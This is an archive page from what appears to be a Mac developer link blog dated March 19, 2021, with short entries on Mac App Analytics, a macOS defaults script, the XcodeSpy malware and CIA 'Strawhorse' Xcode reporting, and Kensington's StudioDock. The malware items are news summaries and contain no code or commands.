Archive for March 19, 2021

Friday, March 19, 2021

Mac Analytics on App Store Connect


App Analytics now provides usage metrics for Mac apps, including data on installations, sessions, active devices, crashes, and deletions. And now you can measure user retention to see how often users return to your app after downloading it.

Note that this is just the basic app lifecycle metrics. MetricKit is still iOS-only.


Setting macOS Defaults via Script

Hacker News is calling this Bash script by Mathias Bynens “Sensible macOS Defaults.” I don’t agree that these are necessarily the particular settings anyone should use, but I endorse the idea of collecting the preferences that one frequently modifies (system and otherwise) into a script. This one has some good examples of how that can be done and also illustrates some settings that are hidden.


XcodeSpy Malware

Phil Stokes (via Patrick Wardle, MacRumors):

Threat actors are abusing the Run Script feature in Apple’s Xcode IDE to infect unsuspecting Apple Developers via shared Xcode Projects.

XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer’s macOS computer along with a persistence mechanism.

The backdoor has functionality for recording the victim’s microphone, camera and keyboard, as well as the ability to upload and download files.


The sample we analyzed used a copy of a legitimate open-source project that can be found on Github called TabBarInteraction.

Jonathan Zdziarski (in 2015, via mikey):

Early this morning, The Intercept posted several documents pertaining to CIA’s research into compromising iOS devices (along with other things) through Sandia National Laboratories, a major research and development contractor to the government. The documents outlined a number of project talks taking place at a closed government conference referred to as the Jamboree in 2012.


Strawhorse, a malicious implementation of Xcode, where App Store developers (likely not suspected of any crimes) would be targeted, and their dev machines backdoored to give CIA injection capabilities into compiled applications. The malicious Xcode variant was capable of stealing the developer’s private codesign keys, which would be smuggled out with compiled binaries. It would also disable securityd so that it would not warn the developer that this was happening. The stolen keys could later be used to inject and sign payloads into the developer’s own products without their permission or knowledge, which could then be widely disseminated through the App Store channels. This could include trojans or watermarks, as the document suggests. With the developer keys extracted, binary modifications could also be made at a later time, if such an injection framework existed.

In spite of what The Intercept wrote, there is no evidence that Strawhorse was slated for use en masse, or that it even reached an operational phase.


Kensington StudioDock for iPad

Federico Viticci:

I’ve spent the past 24 hours testing Kensington’s long-anticipated StudioDock, a $400 docking station that aims to turn the iPad Pro into a desktop workstation with support for display rotation, expansion via USB-C, USB-A, and SD card slots, and integrated Qi charging for iPhone and AirPods. And just like last year, I find myself torn between appreciating the potential of this product and concerned about its timing given rumors of an impending iPad Pro refresh just around the corner.


The StudioDock is a stand that lets you dock the iPad at your desk by attaching it to a magnetic panel that can be rotated to landscape or portrait mode and tilted from 0 to 120 degrees to adjust its viewing angle. Visually, the StudioDock looks like a “mini iMac” where the iPad Pro becomes the display and the “foot” of the stand has a built-in Qi charging pad split into two areas for iPhones and AirPods (or any other device that supports wireless charging and fits on the pad). What makes the StudioDock unique – and, arguably, explains its price – is that, in addition to Qi charging, the stand itself packs a variety of ports to extend the iPad Pro’s I/O options.